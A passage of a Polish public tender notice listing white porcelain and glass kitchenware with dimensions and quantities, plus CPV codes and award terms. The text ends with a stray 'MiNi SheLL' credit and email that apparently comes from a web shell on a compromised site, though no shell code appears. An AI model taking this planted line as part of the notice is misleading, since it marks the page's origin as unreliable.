30.	Sosjerka z białej porcelany - 8 sztuk
a)	Poj.: 0,4 l
b)	Wzmocnione ranty 
c)	Wytrzymała powłoka szklana
d)	Przystosowana do mycia w zmywarkach
e)	Przystosowana do użytkowania w kuchence mikrofalowej

31.	Półmisek owalny z białej porcelany - 6 sztuk
a)	Wymiary: 295 x 224 mm
b)	Wzmocnione ranty
c)	Wytrzymała powłoka szklana
d)	Przystosowana do mycia w zmywarkach
e)	Przystosowana do użytkowania w kuchence mikrofalowej

32.	Bulionówka ze spodkiem typu ARCOROC - biała - 30 zestawów
a)	bulionówka:
-	poj.: 0,3 l,
-	wys. 52 mm
b)	spodek:
-	śr.: 160 mm
-	wys.: 16 mm

33.	Szklanka  żaroodporna bez uszka CARE - 11 sztuk
a)	kwadratowa podstawa 
b)	pojemność: 290 ml

34.	Maselniczka szklana - 15 sztuk
a)	wymiary: 164 x 118 x 55 mm

35.	Tortownica okrągła ze stali węglowej z powłoką nieprzywierającą - 4 sztuki
a)	śr.: 260 mm
b)	wys.: 70 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.00.00.00-6, 39.20.00.00-4, 39.70.00.00-9, 39.13.70.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com